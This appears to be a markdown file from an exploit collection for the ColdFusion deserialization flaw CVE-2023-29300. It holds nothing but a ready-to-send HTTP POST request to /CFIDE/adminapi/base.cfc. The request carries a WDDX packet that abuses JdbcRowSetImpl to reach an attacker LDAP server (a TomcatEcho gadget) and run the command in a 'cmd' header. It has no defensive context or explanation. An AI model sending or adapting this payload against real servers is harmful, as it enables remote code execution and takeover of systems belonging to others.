Adobe ColdFusion 反序列化漏洞CVE-2023-29300.md at main

Adobe ColdFusion 反序列化漏洞CVE-2023-29300.md

26 lines | ISO-8859-1 | 706 bytes

Blame

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 1.2.3.4:1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>